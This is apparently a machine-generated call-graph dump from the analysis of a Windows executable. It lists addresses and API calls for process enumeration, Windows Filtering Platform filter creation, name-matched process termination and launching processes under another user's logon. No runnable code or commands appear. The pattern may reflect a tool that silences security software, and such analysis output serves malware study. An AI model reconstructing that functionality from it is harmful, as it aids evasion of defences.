9177->9193 9180 7ff66eba4963 _errno 9178->9180 9181 7ff66eba14e2 6 API calls 9179->9181 9182 7ff66eba49b0 _errno 9180->9182 9183 7ff66eba496c 9180->9183 9184 7ff66eba4a07 9181->9184 9182->9163 9183->9182 9184->9193 9185 7ff66eba4a9e 9187 7ff66eba4aa9 9185->9187 9188 7ff66eba14e2 6 API calls 9185->9188 9186 7ff66eba490d fread 9186->9185 9186->9193 9187->9163 9190 7ff66eba4ab4 GetProcessHeap HeapFree 9187->9190 9188->9187 9189 7ff66eba4a0c _errno 9191 7ff66eba14e2 6 API calls 9189->9191 9190->9163 9192 7ff66eba4a2e _errno 9191->9192 9192->9193 9194 7ff66eba4a7b _errno 9192->9194 9193->9163 9193->9185 9193->9186 9193->9189 9193->9194 9194->9193 9196 7ff66eba1956 fclose 9195->9196 9197 7ff66eba195b 9195->9197 9196->9197 9198 7ff66eba1983 DeleteCriticalSection 9197->9198 9199 7ff66eba1989 9197->9199 9198->9199 9200 7ff66eba14e2 6 API calls 9199->9200 9201 7ff66eba143c 9200->9201 9201->8946 9201->8947 9203 7ff66eba6272 9202->9203 9204 7ff66eba62e4 9202->9204 9205 7ff66eba627f UnlockFileEx 9203->9205 9206 7ff66eba6315 9203->9206 9207 7ff66eba14e2 6 API calls 9204->9207 9209 7ff66eba6372 GetLastError 9205->9209 9210 7ff66eba62b9 CloseHandle 9205->9210 9208 7ff66eba14e2 6 API calls 9206->9208 9213 7ff66eba630d 9207->9213 9208->9213 9211 7ff66eba14e2 6 API calls 9209->9211 9212 7ff66eba14e2 6 API calls 9210->9212 9211->9213 9214 7ff66eba62d8 9212->9214 9215 7ff66eba14e2 6 API calls 9213->9215 9214->8946 9215->9214 9217 7ff66eba7785 9216->9217 9218 7ff66eba7789 9217->9218 9219 7ff66eba77cd 9217->9219 9222 7ff66eba77ea 9218->9222 9225 7ff66eba77c6 9218->9225 9220 7ff66eba14e2 6 API calls 9219->9220 9221 7ff66eba77e3 9220->9221 9221->8959 9221->8960 9223 7ff66eba14e2 6 API calls 9222->9223 9224 7ff66eba7800 9223->9224 9226 7ff66eba7817 FwpmProviderDestroyEnumHandle0 9224->9226 9225->9224 9227 7ff66eba7865 wcscmp 9225->9227 9226->9221 9228 7ff66eba788a 9226->9228 9227->9225 9228->9221 9229 7ff66eba14e2 6 API calls 9228->9229 9229->9221 9292 7ff66eba9bb9 9230->9292 9233 7ff66eba9537 9234 7ff66eba9bb9 7 API calls 9233->9234 9237 7ff66eba9566 9234->9237 9235 7ff66eba960d 9235->8969 9237->9235 9239 7ff66eba14e2 6 API calls 9237->9239 9309 7ff66ebaa1f1 9237->9309 9315 7ff66eba929a inet_addr ntohl 9237->9315 9239->9237 9241 7ff66eba9bb9 7 API calls 9240->9241 9242 7ff66eba8599 9241->9242 9243 7ff66eba86c1 GetLastError 9242->9243 9244 7ff66eba85dc 9242->9244 9250 7ff66eba86df 9242->9250 9245 7ff66eba14e2 6 API calls 9243->9245 9246 7ff66eba87a3 GetLastError 9244->9246 9265 7ff66eba860e 9244->9265 9245->9250 9248 7ff66eba87b4 9246->9248 9246->9265 9247 7ff66eba8ca5 CloseHandle 9247->9250 9249 7ff66eba14e2 6 API calls 9248->9249 9249->9265 9250->8966 9251 7ff66ebaa1f1 11 API calls 9251->9265 9252 7ff66eba88cd OpenProcess 9254 7ff66eba88ee QueryFullProcessImageNameW 9252->9254 9255 7ff66eba8a78 GetLastError 9252->9255 9253 7ff66eba8669 Process32Next 9256 7ff66eba867d GetLastError 9253->9256 9253->9265 9257 7ff66eba892e GetLastError 9254->9257 9254->9265 9258 7ff66eba14e2 6 API calls 9255->9258 9256->9265 9259 7ff66eba14e2 6 API calls 9257->9259 9258->9265 9259->9265 9261 7ff66eba14e2 6 API calls 9261->9265 9262 7ff66eba8a13 CloseHandle 9262->9265 9263 7ff66eba14e2 6 API calls 9264 7ff66eba86af 9263->9264 9264->9262 9264->9263 9265->9247 9265->9251 9265->9252 9265->9253 9265->9261 9265->9262 9265->9264 9359 7ff66eba8153 9265->9359 9267 7ff66eba9bb9 7 API calls 9266->9267 9268 7ff66eba8d38 9267->9268 9277 7ff66eba9257 9268->9277 9422 7ff66eba1cf4 9268->9422 9271 7ff66eba8d82 9273 7ff66eba8d8a 9271->9273 9275 7ff66eba1c73 8 API calls 9271->9275 9274 7ff66eba8da9 FreeLibrary 9273->9274 9273->9277 9274->9277 9276 7ff66eba8dc6 9275->9276 9276->9277 9278 7ff66eba1c73 8 API calls 9276->9278 9277->8963 9279 7ff66eba8de3 9278->9279 9279->9277 9280 7ff66eba1c73 8 API calls 9279->9280 9281 7ff66eba8e00 9280->9281 9281->9277 9282 7ff66eba1c73 8 API calls 9281->9282 9286 7ff66eba8e18 9282->9286 9283 7ff66ebaa1f1 11 API calls 9283->9286 9284 7ff66eba8ecc strlen 9284->9286 9285 7ff66eba8f64 GetProcessHeap HeapAlloc 9285->9286 9286->9273 9286->9277 9286->9283 9286->9284 9286->9285 9287 7ff66eba8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9286->9287 9289 7ff66eba90f2 GetProcessHeap HeapFree 9286->9289 9290 7ff66eba91dc LocalFree 9286->9290 9291 7ff66eba14e2 6 API calls 9286->9291 9438 7ff66eba795a GetProcessHeap HeapAlloc 9286->9438 9287->9286 9289->9286 9290->9286 9291->9286 9293 7ff66eba9bd1 9292->9293 9294 7ff66eba9bec 9292->9294 9296 7ff66eba9c1f 9293->9296 9297 7ff66eba9bd6 9293->9297 9295 7ff66eba14e2 6 API calls 9294->9295 9303 7ff66eba9c15 9295->9303 9298 7ff66eba14e2 6 API calls 9296->9298 9299 7ff66eba9c52 9297->9299 9302 7ff66eba9bdb 9297->9302 9298->9303 9300 7ff66eba14e2 6 API calls 9299->9300 9300->9303 9301 7ff66eba9cbc 9301->9303 9305 7ff66eba9cc3 9301->9305 9302->9301 9304 7ff66eba9c91 strcmp 9302->9304 9307 7ff66eba14e2 6 API calls 9303->9307 9304->9302 9306 7ff66eba14e2 6 API calls 9305->9306 9308 7ff66eba9689 9306->9308 9307->9308 9308->8962 9308->8969 9308->9233 9310 7ff66ebaa200 9309->9310 9311 7ff66ebaa22c 9309->9311 9322 7ff66ebaa0f0 9310->9322 9312 7ff66eba14e2 6 API calls 9311->9312 9314 7ff66ebaa217 9312->9314 9314->9237 9316 7ff66eba937a 9315->9316 9317 7ff66eba932b 9315->9317 9319 7ff66eba14e2 6 API calls 9316->9319 9318 7ff66eba934f 9317->9318 9320 7ff66eba14e2 6 API calls 9317->9320 9318->9237 9321 7ff66eba952d 9319->9321 9320->9318 9323 7ff66ebaa112 9322->9323 9324 7ff66ebaa153 9322->9324 9334 7ff66eba9ed0 9323->9334 9326 7ff66eba14e2 6 API calls 9324->9326 9330 7ff66ebaa12b 9326->9330 9328 7ff66ebaa183 _errno 9329 7ff66ebb0568 9328->9329 9331 7ff66ebaa1a5 _errno 9329->9331 9330->9314 9331->9330 9332 7ff66ebaa1b4 _errno 9331->9332 9333 7ff66eba14e2 6 API calls 9332->9333 9333->9330 9335 7ff66eba9ee1 9334->9335 9336 7ff66eba9f19 9334->9336 9338 7ff66eba9bb9 7 API calls 9335->9338 9337 7ff66eba14e2 6 API calls 9336->9337 9339 7ff66eba9ef8 9337->9339 9340 7ff66eba9ef4 9338->9340 9339->9328 9339->9330 9340->9339 9342 7ff66eba9d40 9340->9342 9343 7ff66eba9d73 9342->9343 9344 7ff66eba9d58 9342->9344 9345 7ff66eba14e2 6 API calls 9343->9345 9346 7ff66eba9da6 9344->9346 9347 7ff66eba9d5d 9344->9347 9354 7ff66eba9d9c 9345->9354 9348 7ff66eba14e2 6 API calls 9346->9348 9349 7ff66eba9dd9 9347->9349 9355 7ff66eba9d62 9347->9355 9348->9354 9350 7ff66eba14e2 6 API calls 9349->9350 9350->9354 9351 7ff66eba9e3b 9353 7ff66eba9e44 9351->9353 9351->9354 9352 7ff66eba9e18 strcmp 9352->9355 9356 7ff66eba14e2 6 API calls 9353->9356 9358 7ff66eba14e2 6 API calls 9354->9358 9355->9351 9355->9352 9357 7ff66eba9e69 9356->9357 9357->9339 9358->9357 9382 7ff66eba8008 GetFileAttributesW 9359->9382 9362 7ff66eba8192 wcslen 9399 7ff66eba7102 9362->9399 9365 7ff66eba82b9 FwpmFilterAdd0 9367 7ff66eba8461 9365->9367 9368 7ff66eba84ce FwpmFilterAdd0 9365->9368 9366 7ff66eba8239 FwpmFilterDeleteByKey0 9369 7ff66eba8277 FwpmFilterDeleteByKey0 9366->9369 9370 7ff66eba825a 9366->9370 9373 7ff66eba14e2 6 API calls 9367->9373 9374 7ff66eba8540 9368->9374 9375 7ff66eba8474 9368->9375 9372 7ff66eba829c 9369->9372 9377 7ff66eba8182 9369->9377 9371 7ff66eba14e2 6 API calls 9370->9371 9371->9377 9378 7ff66eba14e2 6 API calls 9372->9378 9373->9375 9376 7ff66eba14e2 6 API calls 9374->9376 9379 7ff66eba84a1 9375->9379 9380 7ff66eba848a GetProcessHeap HeapFree 9375->9380 9376->9375 9377->9265 9378->9377 9379->9377 9381 7ff66eba84b2 GetProcessHeap HeapFree 9379->9381 9380->9379 9381->9377 9383 7ff66eba8149 9382->9383 9384 7ff66eba8028 9382->9384 9405 7ff66eba7e04 9384->9405 9386 7ff66eba803b 9387 7ff66eba804f GetProcessHeap HeapAlloc 9386->9387 9388 7ff66eba8041 9386->9388 9389 7ff66eba8071 9387->9389 9390 7ff66eba80d9 9387->9390 9388->9362 9388->9377 9389->9388 9391 7ff66eba807b wcslen GetProcessHeap HeapAlloc 9389->9391 9392 7ff66eba14e2 6 API calls 9390->9392 9393 7ff66eba80f7 9391->9393 9394 7ff66eba80bb 9391->9394 9392->9389 9395 7ff66eba14e2 6 API calls 9393->9395 9396 7ff66eba810f 9394->9396 9397 7ff66eba80c7 memcpy 9394->9397 9395->9394 9396->9388 9398 7ff66eba8114 GetProcessHeap HeapFree 9396->9398 9397->9388 9398->9388 9400 7ff66eba710b 9399->9400 9401 7ff66eba711d 9399->9401 9403 7ff66eba14e2 6 API calls 9400->9403 9404 7ff66eba7110 9400->9404 9402 7ff66eba14e2 6 API calls 9401->9402 9402->9404 9403->9404 9404->9365 9404->9366 9406 7ff66eba7e59 9405->9406 9407 7ff66eba7e6f QueryDosDeviceW 9406->9407 9412 7ff66eba7e5f 9406->9412 9408 7ff66eba7e90 GetLastError 9407->9408 9409 7ff66eba7f6c 9407->9409 9410 7ff66eba14e2 6 API calls 9408->9410 9413 7ff66eba7de7 9409->9413 9410->9412 9412->9386 9416 7ff66ebab270 9413->9416 9417 7ff66ebab27e 9416->9417 9418 7ff66ebab295 9416->9418 9419 7ff66ebadadd fputwc fwprintf _errno 9417->9419 9420 7ff66ebadadd fputwc fwprintf _errno 9418->9420 9421 7ff66eba7dff 9419->9421 9420->9421 9421->9412 9423 7ff66eba1d02 LoadLibraryA 9422->9423 9424 7ff66eba1d2b 9422->9424 9425 7ff66eba1d2e GetLastError 9423->9425 9426 7ff66eba1d10 9423->9426 9424->9425 9428 7ff66eba14e2 6 API calls 9425->9428 9427 7ff66eba14e2 6 API calls 9426->9427 9429 7ff66eba1d29 9427->9429 9428->9429 9429->9271 9430 7ff66eba1c73 9429->9430 9431 7ff66eba1cc1 9430->9431 9432 7ff66eba1c90 GetProcAddress 9430->9432 9434 7ff66eba1cc6 GetLastError 9431->9434 9433 7ff66eba1ca1 9432->9433 9432->9434 9435 7ff66eba14e2 6 API calls 9433->9435 9436 7ff66eba14e2 6 API calls 9434->9436 9437 7ff66eba1cbf 9435->9437 9436->9437 9437->9271 9439 7ff66eba7c4f 9438->9439 9440 7ff66eba79a1 9438->9440 9441 7ff66eba14e2 6 API calls 9439->9441 9442 7ff66eba7102 6 API calls 9440->9442 9451 7ff66eba7c3b 9441->9451 9443 7ff66eba79b1 9442->9443 9444 7ff66eba7a46 9443->9444 9445 7ff66eba7c6c FwpmFilterDeleteByKey0 9443->9445 9450 7ff66eba7b20 FwpmFilterAdd0 9444->9450 9446 7ff66eba7ca7 FwpmFilterDeleteByKey0 9445->9446 9447 7ff66eba7c8d 9445->9447 9449 7ff66eba7cd2 9446->9449 9446->9451 9448 7ff66eba14e2 6 API calls 9447->9448 9448->9451 9452 7ff66eba14e2 6 API calls 9449->9452 9453 7ff66eba7cef FwpmFilterAdd0 9450->9453 9454 7ff66eba7c07 9450->9454 9451->9286 9452->9451 9456 7ff66eba7d5d 9453->9456 9455 7ff66eba14e2 6 API calls 9454->9455 9458 7ff66eba7c1a 9455->9458 9457 7ff66eba14e2 6 API calls 9456->9457 9459 7ff66eba7d7a 9457->9459 9458->9451 9460 7ff66eba7c24 GetProcessHeap HeapFree 9458->9460 9460->9451 11186 7ff66ebb0711 EnterCriticalSection 9965 7ff66ebaad0e 9966 7ff66ebaad13 signal 9965->9966 9967 7ff66ebaad25 signal 9966->9967 9968 7ff66ebaaca1 9966->9968 9967->9968 9465 7ff66ebadc0b 9472 7ff66ebaccd9 9465->9472 9467 7ff66ebae2e0 9468 7ff66ebae301 9467->9468 9469 7ff66ebaccd9 2 API calls 9467->9469 9469->9468 9470 7ff66ebaccd9 fputwc fwprintf 9471 7ff66ebadb86 9470->9471 9471->9465 9471->9467 9471->9470 9473 7ff66ebaccf1 9472->9473 9474 7ff66ebacd06 9473->9474 9475 7ff66ebacd53 9473->9475 9476 7ff66ebacd2a fwprintf 9474->9476 9479 7ff66ebacd31 9474->9479 9477 7ff66ebacd58 9475->9477 9483 7ff66ebaca90 9475->9483 9476->9479 9478 7ff66ebacdab 9477->9478 9481 7ff66ebaca90 fputwc 9477->9481 9478->9479 9482 7ff66ebaca90 fputwc 9478->9482 9479->9471 9481->9477 9482->9478 9484 7ff66ebacaa1 9483->9484 9485 7ff66ebacabc 9484->9485 9486 7ff66ebacab2 fputwc 9484->9486 9485->9475 9486->9485 11208 7ff66ebb0721 DeleteCriticalSection 11209 7ff66ebaff1f GetModuleHandleW GetProcAddress 11210 7ff66ebaff73 11209->11210 11211 7ff66ebaff4c LoadLibraryW GetProcAddress 11209->11211 11211->11210 9975 7ff66eba5923 9976 7ff66eba59d4 9975->9976 9977 7ff66eba5936 9975->9977 9980 7ff66eba14e2 6 API calls 9976->9980 9978 7ff66eba593f CreateFileA 9977->9978 9979 7ff66eba5a04 9977->9979 9982 7ff66eba5a34 GetLastError 9978->9982 9983 7ff66eba597c GetFileSize 9978->9983 9981 7ff66eba14e2 6 API calls 9979->9981 9986 7ff66eba59b4 9980->9986 9981->9986 9987 7ff66eba599b 9982->9987 9984 7ff66eba5afa GetLastError 9983->9984 9983->9987 9984->9987 9985 7ff66eba59ab CloseHandle 9985->9986 9987->9985 9987->9986 10728 7ff66eba3222 10729 7ff66eba3230 WaitForSingleObject 10728->10729 10730 7ff66eba325c 10728->10730 10731 7ff66eba328c GetLastError 10729->10731 10734 7ff66eba3240 10729->10734 10732 7ff66eba14e2 6 API calls 10730->10732 10733 7ff66eba14e2 6 API calls 10731->10733 10732->10734 10733->10734 10741 7ff66ebb0619 MultiByteToWideChar 10742 7ff66eba1a19 10743 7ff66eba1b02 10742->10743 10744 7ff66eba1a32 10742->10744 10745 7ff66eba14e2 6 API calls 10743->10745 10746 7ff66eba1a3b FindResourceA 10744->10746 10747 7ff66eba1b2d 10744->10747 10748 7ff66eba1af2 10745->10748 10750 7ff66eba1b58 GetLastError 10746->10750 10751 7ff66eba1a58 LoadResource 10746->10751 10749 7ff66eba14e2 6 API calls 10747->10749 10749->10748 10752 7ff66eba14e2 6 API calls 10750->10752 10753 7ff66eba1a70 10751->10753 10754 7ff66eba1b86 GetLastError GetLastError 10751->10754 10755 7ff66eba1b79 10752->10755 10757 7ff66eba14e2 6 API calls 10753->10757 10756 7ff66eba14e2 6 API calls 10754->10756 10755->10748 10755->10754 10756->10748 10757->10748 9494 7ff66eba181b 9495 7ff66eba17b9 9494->9495 9496 7ff66eba14e2 6 API calls 9495->9496 9497 7ff66eba17d6 9496->9497 11218 7ff66eba131a 11219 7ff66eba1131 152 API calls 11218->11219 11220 7ff66eba132e 11219->11220 9498 7ff66eba341c 9499 7ff66eba342e GetExitCodeProcess 9498->9499 9500 7ff66eba34ad 9498->9500 9502 7ff66eba350f GetLastError 9499->9502 9503 7ff66eba3444 9499->9503 9501 7ff66eba14e2 6 API calls 9500->9501 9508 7ff66eba34d6 9501->9508 9505 7ff66eba14e2 6 API calls 9502->9505 9504 7ff66eba3452 WaitForSingleObject GetExitCodeProcess 9503->9504 9503->9508 9510 7ff66eba35f9 TerminateProcess 9503->9510 9506 7ff66eba36f1 GetLastError 9504->9506 9507 7ff66eba3476 9504->9507 9505->9508 9511 7ff66eba14e2 6 API calls 9506->9511 9520 7ff66eba33c0 9507->9520 9512 7ff66eba37ac 9508->9512 9515 7ff66eba14e2 6 API calls 9508->9515 9510->9504 9514 7ff66eba360a GetLastError 9510->9514 9511->9508 9517 7ff66eba14e2 6 API calls 9514->9517 9518 7ff66eba34ab 9515->9518 9516 7ff66eba3484 9519 7ff66eba14e2 6 API calls 9516->9519 9517->9503 9519->9518 9521 7ff66eba33ce CloseHandle CloseHandle 9520->9521 9522 7ff66eba33ec 9520->9522 9523 7ff66eba33e5 9521->9523 9524 7ff66eba14e2 6 API calls 9522->9524 9523->9508 9523->9516 9524->9523 9994 7ff66ebac51b 9995 7ff66ebac52d 9994->9995 10000 7ff66ebabbb4 9995->10000 9997 7ff66ebaca67 9998 7ff66ebab3e7 fputc 9999 7ff66ebac382 9998->9999 9999->9997 9999->9998 10003 7ff66ebabbe6 10000->10003 10001 7ff66ebabd06 10002 7ff66ebabd86 10001->10002 10004 7ff66ebab3e7 fputc 10001->10004 10005 7ff66ebabda2 10002->10005 10006 7ff66ebab3e7 fputc 10002->10006 10003->10001 10007 7ff66ebab3e7 fputc 10003->10007 10004->10001 10005->9999 10006->10002 10007->10003 9525 7ff66eba702f 9526 7ff66eba7057 wcslen 9525->9526 9527 7ff66eba704b 9525->9527 9526->9527 10008 7ff66eba212f 10009 7ff66eba21b6 10008->10009 10010 7ff66eba2159 CreateToolhelp32Snapshot 10008->10010 10011 7ff66eba14e2 6 API calls 10009->10011 10012 7ff66eba2175 Process32First 10010->10012 10013 7ff66eba2227 GetLastError 10010->10013 10023 7ff66eba21df 10011->10023 10014 7ff66eba22ff GetLastError 10012->10014 10037 7ff66eba21a6 10012->10037 10015 7ff66eba14e2 6 API calls 10013->10015 10016 7ff66eba230c 10014->10016 10015->10023 10020 7ff66eba14e2 6 API calls 10016->10020 10017 7ff66eba21f4 10021 7ff66eba14e2 6 API calls 10017->10021 10018 7ff66eba28a3 10027 7ff66eba14e2 6 API calls 10018->10027 10019 7ff66eba2888 CloseHandle 10019->10018 10019->10023 10020->10037 10024 7ff66eba2211 10021->10024 10023->10017 10023->10018 10025 7ff66eba24d3 OpenProcess 10029 7ff66eba25a3 GetLastError 10025->10029 10030 7ff66eba24f4 TerminateProcess 10025->10030 10026 7ff66eba24c2 strcmp 10026->10025 10026->10037 10027->10024 10028 7ff66eba26ed Process32Next 10034 7ff66eba2704 GetLastError 10028->10034 10028->10037 10033 7ff66eba14e2 6 API calls 10029->10033 10031 7ff66eba2484 CloseHandle 10030->10031 10032 7ff66eba250a GetLastError 10030->10032 10031->10037 10035 7ff66eba14e2 6 API calls 10032->10035 10033->10037 10034->10037 10035->10037 10036 7ff66eba14e2 6 API calls 10036->10037 10037->10019 10037->10025 10037->10026 10037->10028 10037->10031 10037->10036 10038 7ff66eba292e 10039 7ff66eba2944 10038->10039 10040 7ff66eba299e 10039->10040 10041 7ff66eba2a53 10039->10041 10043 7ff66eba2a87 10040->10043 10044 7ff66eba29a7 10040->10044 10042 7ff66eba14e2 6 API calls 10041->10042 10052 7ff66eba29d5 10042->10052 10047 7ff66eba14e2 6 API calls 10043->10047 10045 7ff66eba2abb 10044->10045 10046 7ff66eba29bd strlen 10044->10046 10048 7ff66eba14e2 6 API calls 10045->10048 10049 7ff66eba2aef strcat 10046->10049 10046->10052 10047->10052 10048->10052 10050 7ff66eba2b08 strlen strlen 10049->10050 10055 7ff66eba2bec 10049->10055 10051 7ff66eba2b38 strlen strcat 10050->10051 10050->10052 10053 7ff66eba2b74 10051->10053 10061 7ff66eba14e2 6 API calls 10052->10061 10076 7ff66eba2a3c 10052->10076 10054 7ff66eba2b95 strlen strlen 10053->10054 10053->10055 10054->10055 10056 7ff66eba2bbc strlen strcat 10054->10056 10055->10052 10069 7ff66eba2c1a 10055->10069 10072 7ff66eba3032 10055->10072 10056->10053 10057 7ff66eba3041 CreateProcessA 10062 7ff66eba3191 10057->10062 10063 7ff66eba3098 GetLastError 10057->10063 10058 7ff66eba2c32 LogonUserA 10059 7ff66eba2c63 GetLastError 10058->10059 10060 7ff66eba2d9d CreateProcessAsUserA 10058->10060 10064 7ff66eba14e2 6 API calls 10059->10064 10066 7ff66eba2eed 10060->10066 10067 7ff66eba2dfc GetLastError 10060->10067 10061->10076 10065 7ff66eba14e2 6 API calls 10062->10065 10068 7ff66eba14e2 6 API calls 10063->10068 10064->10069 10065->10076 10071 7ff66eba14e2 6 API calls 10066->10071 10075 7ff66eba2ce5 10066->10075 10070 7ff66eba14e2 6 API calls 10067->10070 10068->10072 10069->10058 10069->10075 10070->10075 10071->10075 10072->10052 10072->10057 10073 7ff66eba2f27 CloseHandle 10074 7ff66eba2f2d 10073->10074 10074->10052 10077 7ff66eba2f36 10074->10077 10075->10073 10075->10074 10077->10076 10078 7ff66eba14e2 6 API calls 10077->10078 10078->10076 10758 7ff66ebac631 10761 7ff66ebac64d 10758->10761 10759 7ff66ebab5da fputc 10766 7ff66ebac382 10759->10766 10760 7ff66ebac6c3 10760->10759 10761->10760 10762 7ff66ebac6c8 10761->10762 10767 7ff66ebabdaf 10762->10767 10764 7ff66ebaca67 10765 7ff66ebab3e7 fputc 10765->10766 10766->10764 10766->10765 10772 7ff66ebabdc6 10767->10772 10768 7ff66ebabf5e 10769 7ff66ebabf9d 10768->10769 10770 7ff66ebab3e7 fputc 10768->10770 10771 7ff66ebab3e7 fputc 10769->10771 10770->10769 10773 7ff66ebabfaa 10771->10773 10772->10768 10775 7ff66ebab3e7 fputc 10772->10775 10774 7ff66ebab3e7 fputc 10773->10774 10776 7ff66ebabfbb 10774->10776 10775->10772 10778 7ff66ebab3e7 fputc 10776->10778 10779 7ff66ebabfc1 10776->10779 10777 7ff66ebac008 10780 7ff66ebac054 10777->10780 10783 7ff66ebab3e7 fputc 10777->10783 10778->10776 10779->10777 10781 7ff66ebab64c 11 API calls 10779->10781 10782 7ff66ebab3e7 fputc 10779->10782 10785 7ff66ebab420 5 API calls 10779->10785 10784 7ff66ebab3e7 fputc 10780->10784 10781->10779 10782->10779 10783->10777 10786 7ff66ebac068 10784->10786 10785->10779 9535 7ff66ebadc2f 9536 7ff66ebadc62 9535->9536 9537 7ff66ebadc56 9535->9537 9545 7ff66ebacacd 9536->9545 9539 7ff66ebaccd9 2 API calls 9537->9539 9543 7ff66ebadb86 9539->9543 9540 7ff66ebae2e0 9541 7ff66ebae301 9540->9541 9542 7ff66ebaccd9 2 API calls 9540->9542 9542->9541 9543->9540 9544 7ff66ebaccd9 fputwc fwprintf 9543->9544 9544->9543 9546 7ff66ebacae7 9545->9546 9547 7ff66ebacafc 9546->9547 9552 7ff66ebacb4c 9546->9552 9548 7ff66ebacb04 fwprintf 9547->9548 9549 7ff66ebacb27 fwprintf 9547->9549 9551 7ff66ebacb39 9548->9551 9549->9551 9551->9543 9555 7ff66ebaca90 fputwc 9552->9555 9557 7ff66ebacb51 9552->9557 9553 7ff66ebacb8f strlen 9560 7ff66ebb026c 9553->9560 9554 7ff66ebacbd9 9554->9551 9558 7ff66ebaca90 fputwc 9554->9558 9555->9552 9557->9553 9557->9554 9559 7ff66ebaca90 fputwc 9557->9559 9558->9554 9559->9557 9561 7ff66ebb0282 ___mb_cur_max_func ___lc_codepage_func 9560->9561 9562 7ff66ebb027d 9560->9562 9563 7ff66ebb02bb 9561->9563 9562->9561 9566 7ff66ebb0150 9563->9566 9567 7ff66ebb0170 9566->9567 9574 7ff66ebb018c 9566->9574 9568 7ff66ebb0254 9567->9568 9570 7ff66ebb01df IsDBCSLeadByteEx 9567->9570 9572 7ff66ebb01aa 9567->9572 9567->9574 9569 7ff66ebb021f MultiByteToWideChar 9568->9569 9568->9574 9573 7ff66ebb0244 _errno 9569->9573 9569->9574 9570->9568 9570->9572 9571 7ff66ebb01c6 MultiByteToWideChar 9571->9573 9571->9574 9572->9571 9572->9574 9573->9574 9574->9557 10787 7ff66ebade28 10788 7ff66ebade3e 10787->10788 10795 7ff66ebad126 10788->10795 10790 7ff66ebae2e0 10791 7ff66ebae301 10790->10791 10792 7ff66ebaccd9 2 API calls 10790->10792 10792->10791 10793 7ff66ebadb86 10793->10790 10794 7ff66ebaccd9 fputwc fwprintf 10793->10794 10794->10793 10796 7ff66ebad137 10795->10796 10797 7ff66ebad00f 6 API calls 10796->10797 10798 7ff66ebad164 10797->10798 10799 7ff66ebad179 10798->10799 10800 7ff66ebad186 10798->10800 10801 7ff66ebacc00 10 API calls 10799->10801 10802 7ff66ebacdd0 9 API calls 10800->10802 10805 7ff66ebad184 10801->10805 10803 7ff66ebad191 10802->10803 10804 7ff66ebaca90 fputwc 10803->10804 10803->10805 10804->10803 10805->10793 10806 7ff66ebaf626 10807 7ff66ebaf65d 10806->10807 10808 7ff66ebaf63b DeleteCriticalSection 10806->10808 10808->10807 9590 7ff66ebaac27 9591 7ff66ebaac4e 9590->9591 9592 7ff66ebaac6f 9591->9592 9593 7ff66ebaacb5 9591->9593 9594 7ff66ebaacdf signal 9591->9594 9593->9592 9595 7ff66ebaacfb signal 9593->9595 9594->9592 9594->9593 9595->9592 9596 7ff66eba37c0 9597 7ff66eba1cf4 8 API calls 9596->9597 9598 7ff66eba37d0 9597->9598 9599 7ff66eba1c73 8 API calls 9598->9599 9605 7ff66eba3816 9598->9605 9600 7ff66eba37e4 9599->9600 9601 7ff66eba3820 GetLastError 9600->9601 9602 7ff66eba37fc 9600->9602 9600->9605 9604 7ff66eba14e2 6 API calls 9601->9604 9603 7ff66eba14e2 6 API calls 9602->9603 9603->9605 9604->9605 10813 7ff66eba5dc4 10814 7ff66eba5de5 10813->10814 10815 7ff66eba5deb CloseHandle 10814->10815 10816 7ff66eba5df4 10814->10816 10815->10816 10086 7ff66ebac4b9 10087 7ff66ebac4c7 10086->10087 10088 7ff66ebac50e 10087->10088 10089 7ff66ebac4fe 10087->10089 10095 7ff66ebab9b0 10088->10095 10090 7ff66ebabbb4 fputc 10089->10090 10093 7ff66ebac382 10090->10093 10092 7ff66ebaca67 10093->10092 10094 7ff66ebab3e7 fputc 10093->10094 10094->10093 10101 7ff66ebaba02 10095->10101 10096 7ff66ebabb66 10097 7ff66ebabb7f 10096->10097 10098 7ff66ebab3e7 fputc 10096->10098 10099 7ff66ebabba6 10097->10099 10102 7ff66ebab3e7 fputc 10097->10102 10098->10096 10099->10093 10100 7ff66ebab3e7 fputc 10100->10101 10101->10096 10101->10100 10102->10097 9606 7ff66eba1bbb 9607 7ff66eba1bf4 9606->9607 9608 7ff66eba1bcc 9606->9608 9609 7ff66eba14e2 6 API calls 9607->9609 9610 7ff66eba1bd1 9608->9610 9611 7ff66eba14e2 6 API calls 9608->9611 9609->9610 9611->9610 11236 7ff66ebaa6d0 11237 7ff66ebaa6f7 11236->11237 11238 7ff66ebaa763 fprintf 11237->11238 10817 7ff66ebac5cf 10818 7ff66ebac5e5 10817->10818 10823 7ff66ebab919 10818->10823 10820 7ff66ebaca67 10821 7ff66ebac382 10821->10820 10822 7ff66ebab3e7 fputc 10821->10822 10822->10821 10824 7ff66ebab92a 10823->10824 10825 7ff66ebab2d0 6 API calls 10824->10825 10826 7ff66ebab957 10825->10826 10827 7ff66ebab979 10826->10827 10828 7ff66ebab96c 10826->10828 10830 7ff66ebab721 11 API calls 10827->10830 10829 7ff66ebab5da fputc 10828->10829 10833 7ff66ebab977 10829->10833 10831 7ff66ebab984 10830->10831 10832 7ff66ebab3e7 fputc 10831->10832 10831->10833 10832->10831 10833->10821 9630 7ff66eba6fd5 9631 7ff66eba6fe0 9630->9631 9632 7ff66eba6feb GetSystemTimeAsFileTime 9630->9632 9632->9631 10847 7ff66eba89e0 10848 7ff66eba8a13 CloseHandle 10847->10848 10853 7ff66eba860e 10848->10853 10849 7ff66eba8669 Process32Next 10851 7ff66eba867d GetLastError 10849->10851 10849->10853 10850 7ff66eba8ca5 CloseHandle 10852 7ff66eba8cb5 10850->10852 10851->10853 10853->10847 10853->10848 10853->10849 10853->10850 10854 7ff66ebaa1f1 11 API calls 10853->10854 10855 7ff66eba88cd OpenProcess 10853->10855 10861 7ff66eba8153 29 API calls 10853->10861 10862 7ff66eba14e2 6 API calls 10853->10862 10854->10853 10856 7ff66eba88ee QueryFullProcessImageNameW 10855->10856 10857 7ff66eba8a78 GetLastError 10855->10857 10856->10853 10858 7ff66eba892e GetLastError 10856->10858 10859 7ff66eba14e2 6 API calls 10857->10859 10860 7ff66eba14e2 6 API calls 10858->10860 10859->10853 10860->10853 10861->10853 10862->10853 9642 7ff66ebaafe1 strlen 9643 7ff66ebaaff9 9642->9643 9644 7ff66ebab043 9642->9644 9643->9644 9645 7ff66ebab026 strncmp 9643->9645 9645->9643 9645->9644 9646 7ff66ebaa3e1 9647 7ff66ebaa43e 9646->9647 9648 7ff66ebaa3f9 9646->9648 9651 7ff66eba14e2 6 API calls 9647->9651 9649 7ff66ebaa46e 9648->9649 9650 7ff66ebaa3fe 9648->9650 9653 7ff66eba14e2 6 API calls 9649->9653 9652 7ff66eba9ed0 